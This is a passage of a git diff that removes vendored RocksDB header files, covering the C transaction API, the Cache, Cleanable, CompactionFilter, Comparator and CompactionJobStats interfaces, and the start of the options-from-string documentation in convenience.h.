-                                    const rocksdb_readoptions_t* options);
-
-extern ROCKSDB_LIBRARY_API rocksdb_iterator_t*
-rocksdb_transactiondb_create_iterator(rocksdb_transactiondb_t* txn_db,
-                                      const rocksdb_readoptions_t* options);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_close(
-    rocksdb_transactiondb_t* txn_db);
-
-extern ROCKSDB_LIBRARY_API rocksdb_checkpoint_t*
-rocksdb_transactiondb_checkpoint_object_create(rocksdb_transactiondb_t* txn_db,
-                                               char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_optimistictransactiondb_t*
-rocksdb_optimistictransactiondb_open(const rocksdb_options_t* options,
-                                     const char* name, char** errptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_transaction_t*
-rocksdb_optimistictransaction_begin(
-    rocksdb_optimistictransactiondb_t* otxn_db,
-    const rocksdb_writeoptions_t* write_options,
-    const rocksdb_optimistictransaction_options_t* otxn_options,
-    rocksdb_transaction_t* old_txn);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_optimistictransactiondb_close(
-    rocksdb_optimistictransactiondb_t* otxn_db);
-
-/* Transaction Options */
-
-extern ROCKSDB_LIBRARY_API rocksdb_transactiondb_options_t*
-rocksdb_transactiondb_options_create();
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_options_destroy(
-    rocksdb_transactiondb_options_t* opt);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_options_set_max_num_locks(
-    rocksdb_transactiondb_options_t* opt, int64_t max_num_locks);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_options_set_num_stripes(
-    rocksdb_transactiondb_options_t* opt, size_t num_stripes);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_transactiondb_options_set_transaction_lock_timeout(
-    rocksdb_transactiondb_options_t* opt, int64_t txn_lock_timeout);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_transactiondb_options_set_default_lock_timeout(
-    rocksdb_transactiondb_options_t* opt, int64_t default_lock_timeout);
-
-extern ROCKSDB_LIBRARY_API rocksdb_transaction_options_t*
-rocksdb_transaction_options_create();
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_destroy(
-    rocksdb_transaction_options_t* opt);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_set_snapshot(
-    rocksdb_transaction_options_t* opt, unsigned char v);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_deadlock_detect(
-    rocksdb_transaction_options_t* opt, unsigned char v);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_lock_timeout(
-    rocksdb_transaction_options_t* opt, int64_t lock_timeout);
-
-extern ROCKSDB_LIBRARY_API void rocksdb_transaction_options_set_expiration(
-    rocksdb_transaction_options_t* opt, int64_t expiration);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_transaction_options_set_deadlock_detect_depth(
-    rocksdb_transaction_options_t* opt, int64_t depth);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_transaction_options_set_max_write_batch_size(
-    rocksdb_transaction_options_t* opt, size_t size);
-
-
-extern ROCKSDB_LIBRARY_API rocksdb_optimistictransaction_options_t*
-rocksdb_optimistictransaction_options_create();
-
-extern ROCKSDB_LIBRARY_API void rocksdb_optimistictransaction_options_destroy(
-    rocksdb_optimistictransaction_options_t* opt);
-
-extern ROCKSDB_LIBRARY_API void
-rocksdb_optimistictransaction_options_set_set_snapshot(
-    rocksdb_optimistictransaction_options_t* opt, unsigned char v);
-
-// referring to convention (3), this should be used by client
-// to free memory that was malloc()ed
-extern ROCKSDB_LIBRARY_API void rocksdb_free(void* ptr);
-
-extern ROCKSDB_LIBRARY_API rocksdb_pinnableslice_t* rocksdb_get_pinned(
-    rocksdb_t* db, const rocksdb_readoptions_t* options, const char* key,
-    size_t keylen, char** errptr);
-extern ROCKSDB_LIBRARY_API rocksdb_pinnableslice_t* rocksdb_get_pinned_cf(
-    rocksdb_t* db, const rocksdb_readoptions_t* options,
-    rocksdb_column_family_handle_t* column_family, const char* key,
-    size_t keylen, char** errptr);
-extern ROCKSDB_LIBRARY_API void rocksdb_pinnableslice_destroy(
-    rocksdb_pinnableslice_t* v);
-extern ROCKSDB_LIBRARY_API const char* rocksdb_pinnableslice_value(
-    const rocksdb_pinnableslice_t* t, size_t* vlen);
-
-#ifdef __cplusplus
-}  /* end extern "C" */
-#endif
-
-#endif  /* STORAGE_ROCKSDB_INCLUDE_C_H_ */
diff --git a/thirdparty/rocksdb/include/rocksdb/cache.h b/thirdparty/rocksdb/include/rocksdb/cache.h
deleted file mode 100644
index 5ebd66b..0000000
--- a/thirdparty/rocksdb/include/rocksdb/cache.h
+++ /dev/null
@@ -1,200 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A Cache is an interface that maps keys to values.  It has internal
-// synchronization and may be safely accessed concurrently from
-// multiple threads.  It may automatically evict entries to make room
-// for new entries.  Values have a specified charge against the cache
-// capacity.  For example, a cache where the values are variable
-// length strings, may use the length of the string as the charge for
-// the string.
-//
-// A builtin cache implementation with a least-recently-used eviction
-// policy is provided.  Clients may use their own implementations if
-// they want something more sophisticated (like scan-resistance, a
-// custom eviction policy, variable cache sizing, etc.)
-
-#pragma once
-
-#include <stdint.h>
-#include <memory>
-#include <string>
-#include "rocksdb/slice.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Cache;
-
-// Create a new cache with a fixed size capacity. The cache is sharded
-// to 2^num_shard_bits shards, by hash of the key. The total capacity
-// is divided and evenly assigned to each shard. If strict_capacity_limit
-// is set, insert to the cache will fail when cache is full. User can also
-// set percentage of the cache reserves for high priority entries via
-// high_pri_pool_pct.
-// num_shard_bits = -1 means it is automatically determined: every shard
-// will be at least 512KB and number of shard bits will not exceed 6.
-extern std::shared_ptr<Cache> NewLRUCache(size_t capacity,
-                                          int num_shard_bits = -1,
-                                          bool strict_capacity_limit = false,
-                                          double high_pri_pool_ratio = 0.0);
-
-// Similar to NewLRUCache, but create a cache based on CLOCK algorithm with
-// better concurrent performance in some cases. See util/clock_cache.cc for
-// more detail.
-//
-// Return nullptr if it is not supported.
-extern std::shared_ptr<Cache> NewClockCache(size_t capacity,
-                                            int num_shard_bits = -1,
-                                            bool strict_capacity_limit = false);
-
-class Cache {
- public:
-  // Depending on implementation, cache entries with high priority could be less
-  // likely to get evicted than low priority entries.
-  enum class Priority { HIGH, LOW };
-
-  Cache() {}
-
-  // Destroys all existing entries by calling the "deleter"
-  // function that was passed via the Insert() function.
-  //
-  // @See Insert
-  virtual ~Cache() {}
-
-  // Opaque handle to an entry stored in the cache.
-  struct Handle {};
-
-  // The type of the Cache
-  virtual const char* Name() const = 0;
-
-  // Insert a mapping from key->value into the cache and assign it
-  // the specified charge against the total cache capacity.
-  // If strict_capacity_limit is true and cache reaches its full capacity,
-  // return Status::Incomplete.
-  //
-  // If handle is not nullptr, returns a handle that corresponds to the
-  // mapping. The caller must call this->Release(handle) when the returned
-  // mapping is no longer needed. In case of error caller is responsible to
-  // cleanup the value (i.e. calling "deleter").
-  //
-  // If handle is nullptr, it is as if Release is called immediately after
-  // insert. In case of error value will be cleanup.
-  //
-  // When the inserted entry is no longer needed, the key and
-  // value will be passed to "deleter".
-  virtual Status Insert(const Slice& key, void* value, size_t charge,
-                        void (*deleter)(const Slice& key, void* value),
-                        Handle** handle = nullptr,
-                        Priority priority = Priority::LOW) = 0;
-
-  // If the cache has no mapping for "key", returns nullptr.
-  //
-  // Else return a handle that corresponds to the mapping.  The caller
-  // must call this->Release(handle) when the returned mapping is no
-  // longer needed.
-  // If stats is not nullptr, relative tickers could be used inside the
-  // function.
-  virtual Handle* Lookup(const Slice& key, Statistics* stats = nullptr) = 0;
-
-  // Increments the reference count for the handle if it refers to an entry in
-  // the cache. Returns true if refcount was incremented; otherwise, returns
-  // false.
-  // REQUIRES: handle must have been returned by a method on *this.
-  virtual bool Ref(Handle* handle) = 0;
-
-  /**
-   * Release a mapping returned by a previous Lookup(). A released entry might
-   * still  remain in cache in case it is later looked up by others. If
-   * force_erase is set then it also erase it from the cache if there is no
-   * other reference to  it. Erasing it should call the deleter function that
-   * was provided when the
-   * entry was inserted.
-   *
-   * Returns true if the entry was also erased.
-   */
-  // REQUIRES: handle must not have been released yet.
-  // REQUIRES: handle must have been returned by a method on *this.
-  virtual bool Release(Handle* handle, bool force_erase = false) = 0;
-
-  // Return the value encapsulated in a handle returned by a
-  // successful Lookup().
-  // REQUIRES: handle must not have been released yet.
-  // REQUIRES: handle must have been returned by a method on *this.
-  virtual void* Value(Handle* handle) = 0;
-
-  // If the cache contains entry for key, erase it.  Note that the
-  // underlying entry will be kept around until all existing handles
-  // to it have been released.
-  virtual void Erase(const Slice& key) = 0;
-  // Return a new numeric id.  May be used by multiple clients who are
-  // sharding the same cache to partition the key space.  Typically the
-  // client will allocate a new id at startup and prepend the id to
-  // its cache keys.
-  virtual uint64_t NewId() = 0;
-
-  // sets the maximum configured capacity of the cache. When the new
-  // capacity is less than the old capacity and the existing usage is
-  // greater than new capacity, the implementation will do its best job to
-  // purge the released entries from the cache in order to lower the usage
-  virtual void SetCapacity(size_t capacity) = 0;
-
-  // Set whether to return error on insertion when cache reaches its full
-  // capacity.
-  virtual void SetStrictCapacityLimit(bool strict_capacity_limit) = 0;
-
-  // Get the flag whether to return error on insertion when cache reaches its
-  // full capacity.
-  virtual bool HasStrictCapacityLimit() const = 0;
-
-  // returns the maximum configured capacity of the cache
-  virtual size_t GetCapacity() const = 0;
-
-  // returns the memory size for the entries residing in the cache.
-  virtual size_t GetUsage() const = 0;
-
-  // returns the memory size for a specific entry in the cache.
-  virtual size_t GetUsage(Handle* handle) const = 0;
-
-  // returns the memory size for the entries in use by the system
-  virtual size_t GetPinnedUsage() const = 0;
-
-  // Call this on shutdown if you want to speed it up. Cache will disown
-  // any underlying data and will not free it on delete. This call will leak
-  // memory - call this only if you're shutting down the process.
-  // Any attempts of using cache after this call will fail terribly.
-  // Always delete the DB object before calling this method!
-  virtual void DisownData(){
-      // default implementation is noop
-  };
-
-  // Apply callback to all entries in the cache
-  // If thread_safe is true, it will also lock the accesses. Otherwise, it will
-  // access the cache without the lock held
-  virtual void ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                      bool thread_safe) = 0;
-
-  // Remove all entries.
-  // Prerequisite: no entry is referenced.
-  virtual void EraseUnRefEntries() = 0;
-
-  virtual std::string GetPrintableOptions() const { return ""; }
-
-  // Mark the last inserted object as being a raw data block. This will be used
-  // in tests. The default implementation does nothing.
-  virtual void TEST_mark_as_data_block(const Slice& key, size_t charge) {}
-
- private:
-  // No copying allowed
-  Cache(const Cache&);
-  Cache& operator=(const Cache&);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/cleanable.h b/thirdparty/rocksdb/include/rocksdb/cleanable.h
deleted file mode 100644
index cd2e942..0000000
--- a/thirdparty/rocksdb/include/rocksdb/cleanable.h
+++ /dev/null
@@ -1,82 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// An iterator yields a sequence of key/value pairs from a source.
-// The following class defines the interface.  Multiple implementations
-// are provided by this library.  In particular, iterators are provided
-// to access the contents of a Table or a DB.
-//
-// Multiple threads can invoke const methods on an Iterator without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same Iterator must use
-// external synchronization.
-
-#ifndef INCLUDE_ROCKSDB_CLEANABLE_H_
-#define INCLUDE_ROCKSDB_CLEANABLE_H_
-
-namespace rocksdb {
-
-class Cleanable {
- public:
-  Cleanable();
-  ~Cleanable();
-
-  // No copy constructor and copy assignment allowed.
-  Cleanable(Cleanable&) = delete;
-  Cleanable& operator=(Cleanable&) = delete;
-
-  // Move consturctor and move assignment is allowed.
-  Cleanable(Cleanable&&);
-  Cleanable& operator=(Cleanable&&);
-
-  // Clients are allowed to register function/arg1/arg2 triples that
-  // will be invoked when this iterator is destroyed.
-  //
-  // Note that unlike all of the preceding methods, this method is
-  // not abstract and therefore clients should not override it.
-  typedef void (*CleanupFunction)(void* arg1, void* arg2);
-  void RegisterCleanup(CleanupFunction function, void* arg1, void* arg2);
-  void DelegateCleanupsTo(Cleanable* other);
-  // DoCleanup and also resets the pointers for reuse
-  inline void Reset() {
-    DoCleanup();
-    cleanup_.function = nullptr;
-    cleanup_.next = nullptr;
-  }
-
- protected:
-  struct Cleanup {
-    CleanupFunction function;
-    void* arg1;
-    void* arg2;
-    Cleanup* next;
-  };
-  Cleanup cleanup_;
-  // It also becomes the owner of c
-  void RegisterCleanup(Cleanup* c);
-
- private:
-  // Performs all the cleanups. It does not reset the pointers. Making it
-  // private
-  // to prevent misuse
-  inline void DoCleanup() {
-    if (cleanup_.function != nullptr) {
-      (*cleanup_.function)(cleanup_.arg1, cleanup_.arg2);
-      for (Cleanup* c = cleanup_.next; c != nullptr;) {
-        (*c->function)(c->arg1, c->arg2);
-        Cleanup* next = c->next;
-        delete c;
-        c = next;
-      }
-    }
-  }
-};
-
-}  // namespace rocksdb
-
-#endif  // INCLUDE_ROCKSDB_CLEANABLE_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/compaction_filter.h b/thirdparty/rocksdb/include/rocksdb/compaction_filter.h
deleted file mode 100644
index 64f61a3..0000000
--- a/thirdparty/rocksdb/include/rocksdb/compaction_filter.h
+++ /dev/null
@@ -1,212 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2013 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_COMPACTION_FILTER_H_
-#define STORAGE_ROCKSDB_INCLUDE_COMPACTION_FILTER_H_
-
-#include <cassert>
-#include <memory>
-#include <string>
-#include <vector>
-
-namespace rocksdb {
-
-class Slice;
-class SliceTransform;
-
-// Context information of a compaction run
-struct CompactionFilterContext {
-  // Does this compaction run include all data files
-  bool is_full_compaction;
-  // Is this compaction requested by the client (true),
-  // or is it occurring as an automatic compaction process
-  bool is_manual_compaction;
-};
-
-// CompactionFilter allows an application to modify/delete a key-value at
-// the time of compaction.
-
-class CompactionFilter {
- public:
-  enum ValueType {
-    kValue,
-    kMergeOperand,
-    kBlobIndex,  // used internally by BlobDB.
-  };
-
-  enum class Decision {
-    kKeep,
-    kRemove,
-    kChangeValue,
-    kRemoveAndSkipUntil,
-  };
-
-  // Context information of a compaction run
-  struct Context {
-    // Does this compaction run include all data files
-    bool is_full_compaction;
-    // Is this compaction requested by the client (true),
-    // or is it occurring as an automatic compaction process
-    bool is_manual_compaction;
-    // Which column family this compaction is for.
-    uint32_t column_family_id;
-  };
-
-  virtual ~CompactionFilter() {}
-
-  // The compaction process invokes this
-  // method for kv that is being compacted. A return value
-  // of false indicates that the kv should be preserved in the
-  // output of this compaction run and a return value of true
-  // indicates that this key-value should be removed from the
-  // output of the compaction.  The application can inspect
-  // the existing value of the key and make decision based on it.
-  //
-  // Key-Values that are results of merge operation during compaction are not
-  // passed into this function. Currently, when you have a mix of Put()s and
-  // Merge()s on a same key, we only guarantee to process the merge operands
-  // through the compaction filters. Put()s might be processed, or might not.
-  //
-  // When the value is to be preserved, the application has the option
-  // to modify the existing_value and pass it back through new_value.
-  // value_changed needs to be set to true in this case.
-  //
-  // If you use snapshot feature of RocksDB (i.e. call GetSnapshot() API on a
-  // DB* object), CompactionFilter might not be very useful for you. Due to
-  // guarantees we need to maintain, compaction process will not call Filter()
-  // on any keys that were written before the latest snapshot. In other words,
-  // compaction will only call Filter() on keys written after your most recent
-  // call to GetSnapshot(). In most cases, Filter() will not be called very
-  // often. This is something we're fixing. See the discussion at:
-  // https://www.facebook.com/groups/mysqlonrocksdb/permalink/999723240091865/
-  //
-  // If multithreaded compaction is being used *and* a single CompactionFilter
-  // instance was supplied via Options::compaction_filter, this method may be
-  // called from different threads concurrently.  The application must ensure
-  // that the call is thread-safe.
-  //
-  // If the CompactionFilter was created by a factory, then it will only ever
-  // be used by a single thread that is doing the compaction run, and this
-  // call does not need to be thread-safe.  However, multiple filters may be
-  // in existence and operating concurrently.
-  //
-  // The last paragraph is not true if you set max_subcompactions to more than
-  // 1. In that case, subcompaction from multiple threads may call a single
-  // CompactionFilter concurrently.
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value, bool* value_changed) const {
-    return false;
-  }
-
-  // The compaction process invokes this method on every merge operand. If this
-  // method returns true, the merge operand will be ignored and not written out
-  // in the compaction output
-  //
-  // Note: If you are using a TransactionDB, it is not recommended to implement
-  // FilterMergeOperand().  If a Merge operation is filtered out, TransactionDB
-  // may not realize there is a write conflict and may allow a Transaction to
-  // Commit that should have failed.  Instead, it is better to implement any
-  // Merge filtering inside the MergeOperator.
-  virtual bool FilterMergeOperand(int level, const Slice& key,
-                                  const Slice& operand) const {
-    return false;
-  }
-
-  // An extended API. Called for both values and merge operands.
-  // Allows changing value and skipping ranges of keys.
-  // The default implementation uses Filter() and FilterMergeOperand().
-  // If you're overriding this method, no need to override the other two.
-  // `value_type` indicates whether this key-value corresponds to a normal
-  // value (e.g. written with Put())  or a merge operand (written with Merge()).
-  //
-  // Possible return values:
-  //  * kKeep - keep the key-value pair.
-  //  * kRemove - remove the key-value pair or merge operand.
-  //  * kChangeValue - keep the key and change the value/operand to *new_value.
-  //  * kRemoveAndSkipUntil - remove this key-value pair, and also remove
-  //      all key-value pairs with key in [key, *skip_until). This range
-  //      of keys will be skipped without reading, potentially saving some
-  //      IO operations compared to removing the keys one by one.
-  //
-  //      *skip_until <= key is treated the same as Decision::kKeep
-  //      (since the range [key, *skip_until) is empty).
-  //
-  //      Caveats:
-  //       - The keys are skipped even if there are snapshots containing them,
-  //         as if IgnoreSnapshots() was true; i.e. values removed
-  //         by kRemoveAndSkipUntil can disappear from a snapshot - beware
-  //         if you're using TransactionDB or DB::GetSnapshot().
-  //       - If value for a key was overwritten or merged into (multiple Put()s
-  //         or Merge()s), and compaction filter skips this key with
-  //         kRemoveAndSkipUntil, it's possible that it will remove only
-  //         the new value, exposing the old value that was supposed to be
-  //         overwritten.
-  //       - Doesn't work with PlainTableFactory in prefix mode.
-  //       - If you use kRemoveAndSkipUntil, consider also reducing
-  //         compaction_readahead_size option.
-  //
-  // Note: If you are using a TransactionDB, it is not recommended to filter
-  // out or modify merge operands (ValueType::kMergeOperand).
-  // If a merge operation is filtered out, TransactionDB may not realize there
-  // is a write conflict and may allow a Transaction to Commit that should have
-  // failed. Instead, it is better to implement any Merge filtering inside the
-  // MergeOperator.
-  virtual Decision FilterV2(int level, const Slice& key, ValueType value_type,
-                            const Slice& existing_value, std::string* new_value,
-                            std::string* skip_until) const {
-    switch (value_type) {
-      case ValueType::kValue: {
-        bool value_changed = false;
-        bool rv = Filter(level, key, existing_value, new_value, &value_changed);
-        if (rv) {
-          return Decision::kRemove;
-        }
-        return value_changed ? Decision::kChangeValue : Decision::kKeep;
-      }
-      case ValueType::kMergeOperand: {
-        bool rv = FilterMergeOperand(level, key, existing_value);
-        return rv ? Decision::kRemove : Decision::kKeep;
-      }
-      case ValueType::kBlobIndex:
-        return Decision::kKeep;
-    }
-    assert(false);
-    return Decision::kKeep;
-  }
-
-  // By default, compaction will only call Filter() on keys written after the
-  // most recent call to GetSnapshot(). However, if the compaction filter
-  // overrides IgnoreSnapshots to make it return true, the compaction filter
-  // will be called even if the keys were written before the last snapshot.
-  // This behavior is to be used only when we want to delete a set of keys
-  // irrespective of snapshots. In particular, care should be taken
-  // to understand that the values of these keys will change even if we are
-  // using a snapshot.
-  virtual bool IgnoreSnapshots() const { return false; }
-
-  // Returns a name that identifies this compaction filter.
-  // The name will be printed to LOG file on start up for diagnosis.
-  virtual const char* Name() const = 0;
-};
-
-// Each compaction will create a new CompactionFilter allowing the
-// application to know about different compactions
-class CompactionFilterFactory {
- public:
-  virtual ~CompactionFilterFactory() { }
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) = 0;
-
-  // Returns a name that identifies this compaction filter factory.
-  virtual const char* Name() const = 0;
-};
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_COMPACTION_FILTER_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/compaction_job_stats.h b/thirdparty/rocksdb/include/rocksdb/compaction_job_stats.h
deleted file mode 100644
index ebb04a4..0000000
--- a/thirdparty/rocksdb/include/rocksdb/compaction_job_stats.h
+++ /dev/null
@@ -1,91 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-
-namespace rocksdb {
-struct CompactionJobStats {
-  CompactionJobStats() { Reset(); }
-  void Reset();
-  // Aggregate the CompactionJobStats from another instance with this one
-  void Add(const CompactionJobStats& stats);
-
-  // the elapsed time of this compaction in microseconds.
-  uint64_t elapsed_micros;
-
-  // the number of compaction input records.
-  uint64_t num_input_records;
-  // the number of compaction input files.
-  size_t num_input_files;
-  // the number of compaction input files at the output level.
-  size_t num_input_files_at_output_level;
-
-  // the number of compaction output records.
-  uint64_t num_output_records;
-  // the number of compaction output files.
-  size_t num_output_files;
-
-  // true if the compaction is a manual compaction
-  bool is_manual_compaction;
-
-  // the size of the compaction input in bytes.
-  uint64_t total_input_bytes;
-  // the size of the compaction output in bytes.
-  uint64_t total_output_bytes;
-
-  // number of records being replaced by newer record associated with same key.
-  // this could be a new value or a deletion entry for that key so this field
-  // sums up all updated and deleted keys
-  uint64_t num_records_replaced;
-
-  // the sum of the uncompressed input keys in bytes.
-  uint64_t total_input_raw_key_bytes;
-  // the sum of the uncompressed input values in bytes.
-  uint64_t total_input_raw_value_bytes;
-
-  // the number of deletion entries before compaction. Deletion entries
-  // can disappear after compaction because they expired
-  uint64_t num_input_deletion_records;
-  // number of deletion records that were found obsolete and discarded
-  // because it is not possible to delete any more keys with this entry
-  // (i.e. all possible deletions resulting from it have been completed)
-  uint64_t num_expired_deletion_records;
-
-  // number of corrupt keys (ParseInternalKey returned false when applied to
-  // the key) encountered and written out.
-  uint64_t num_corrupt_keys;
-
-  // Following counters are only populated if
-  // options.report_bg_io_stats = true;
-
-  // Time spent on file's Append() call.
-  uint64_t file_write_nanos;
-
-  // Time spent on sync file range.
-  uint64_t file_range_sync_nanos;
-
-  // Time spent on file fsync.
-  uint64_t file_fsync_nanos;
-
-  // Time spent on preparing file write (falocate, etc)
-  uint64_t file_prepare_write_nanos;
-
-  // 0-terminated strings storing the first 8 bytes of the smallest and
-  // largest key in the output.
-  static const size_t kMaxPrefixLength = 8;
-
-  std::string smallest_output_key_prefix;
-  std::string largest_output_key_prefix;
-
-  // number of single-deletes which do not meet a put
-  uint64_t num_single_del_fallthru;
-
-  // number of single-deletes which meet something other than a put
-  uint64_t num_single_del_mismatch;
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/comparator.h b/thirdparty/rocksdb/include/rocksdb/comparator.h
deleted file mode 100644
index 64db73a..0000000
--- a/thirdparty/rocksdb/include/rocksdb/comparator.h
+++ /dev/null
@@ -1,84 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_COMPARATOR_H_
-#define STORAGE_ROCKSDB_INCLUDE_COMPARATOR_H_
-
-#include <string>
-
-namespace rocksdb {
-
-class Slice;
-
-// A Comparator object provides a total order across slices that are
-// used as keys in an sstable or a database.  A Comparator implementation
-// must be thread-safe since rocksdb may invoke its methods concurrently
-// from multiple threads.
-class Comparator {
- public:
-  virtual ~Comparator();
-
-  // Three-way comparison.  Returns value:
-  //   < 0 iff "a" < "b",
-  //   == 0 iff "a" == "b",
-  //   > 0 iff "a" > "b"
-  virtual int Compare(const Slice& a, const Slice& b) const = 0;
-
-  // Compares two slices for equality. The following invariant should always
-  // hold (and is the default implementation):
-  //   Equal(a, b) iff Compare(a, b) == 0
-  // Overwrite only if equality comparisons can be done more efficiently than
-  // three-way comparisons.
-  virtual bool Equal(const Slice& a, const Slice& b) const {
-    return Compare(a, b) == 0;
-  }
-
-  // The name of the comparator.  Used to check for comparator
-  // mismatches (i.e., a DB created with one comparator is
-  // accessed using a different comparator.
-  //
-  // The client of this package should switch to a new name whenever
-  // the comparator implementation changes in a way that will cause
-  // the relative ordering of any two keys to change.
-  //
-  // Names starting with "rocksdb." are reserved and should not be used
-  // by any clients of this package.
-  virtual const char* Name() const = 0;
-
-  // Advanced functions: these are used to reduce the space requirements
-  // for internal data structures like index blocks.
-
-  // If *start < limit, changes *start to a short string in [start,limit).
-  // Simple comparator implementations may return with *start unchanged,
-  // i.e., an implementation of this method that does nothing is correct.
-  virtual void FindShortestSeparator(
-      std::string* start,
-      const Slice& limit) const = 0;
-
-  // Changes *key to a short string >= *key.
-  // Simple comparator implementations may return with *key unchanged,
-  // i.e., an implementation of this method that does nothing is correct.
-  virtual void FindShortSuccessor(std::string* key) const = 0;
-
-  // if it is a wrapped comparator, may return the root one.
-  // return itself it is not wrapped.
-  virtual const Comparator* GetRootComparator() const { return this; }
-};
-
-// Return a builtin comparator that uses lexicographic byte-wise
-// ordering.  The result remains the property of this module and
-// must not be deleted.
-extern const Comparator* BytewiseComparator();
-
-// Return a builtin comparator that uses reverse lexicographic byte-wise
-// ordering.
-extern const Comparator* ReverseBytewiseComparator();
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_COMPARATOR_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/convenience.h b/thirdparty/rocksdb/include/rocksdb/convenience.h
deleted file mode 100644
index 4a60afb..0000000
--- a/thirdparty/rocksdb/include/rocksdb/convenience.h
+++ /dev/null
@@ -1,339 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-// The following set of functions provide a way to construct RocksDB Options
-// from a string or a string-to-string map.  Here're the general rule of
-// setting option values from strings by type.  Some RocksDB types are also
-// supported in these APIs.  Please refer to the comment of the function itself
-// to find more information about how to config those RocksDB types.
-//
-// * Strings:
-//   Strings will be used as values directly without any truncating or
-//   trimming.
-//
-// * Booleans:
-//   - "true" or "1" => true
-//   - "false" or "0" => false.
-//   [Example]:
-//   - {"optimize_filters_for_hits", "1"} in GetColumnFamilyOptionsFromMap, or
-//   - "optimize_filters_for_hits=true" in GetColumnFamilyOptionsFromString.
-//
-// * Integers:
-//   Integers are converted directly from string, in addition to the following
-//   units that we support:
-//   - 'k' or 'K' => 2^10
-//   - 'm' or 'M' => 2^20
-//   - 'g' or 'G' => 2^30
-//   - 't' or 'T' => 2^40  // only for unsigned int with sufficient bits.
-//   [Example]:
-//   - {"arena_block_size", "19G"} in GetColumnFamilyOptionsFromMap, or
-//   - "arena_block_size=19G" in GetColumnFamilyOptionsFromString.
-//
-// * Doubles / Floating Points:
-//   Doubles / Floating Points are converted directly from string.  Note that
-//   currently we do not support units.
-//   [Example]:
-//   - {"hard_rate_limit", "2.1"} in GetColumnFamilyOptionsFromMap, or
-//   - "hard_rate_limit=2.1" in GetColumnFamilyOptionsFromString.
-// * Array / Vectors:
-//   An array is specified by a list of values, where ':' is used as
-//   the delimiter to separate each value.
-//   [Example]:
-//   - {"compression_per_level", "kNoCompression:kSnappyCompression"}
-//     in GetColumnFamilyOptionsFromMap, or
-//   - "compression_per_level=kNoCompression:kSnappyCompression" in
-//     GetColumnFamilyOptionsFromMapString
-// * Enums:
-//   The valid values of each enum are identical to the names of its constants.
-//   [Example]:
-//   - CompressionType: valid values are "kNoCompression",
-//     "kSnappyCompression", "kZlibCompression", "kBZip2Compression", ...
-//   - CompactionStyle: valid values are "kCompactionStyleLevel",
-//     "kCompactionStyleUniversal", "kCompactionStyleFIFO", and
-//     "kCompactionStyleNone".
-//
-
-// Take a default ColumnFamilyOptions "base_options" in addition to a
-// map "opts_map" of option name to option value to construct the new
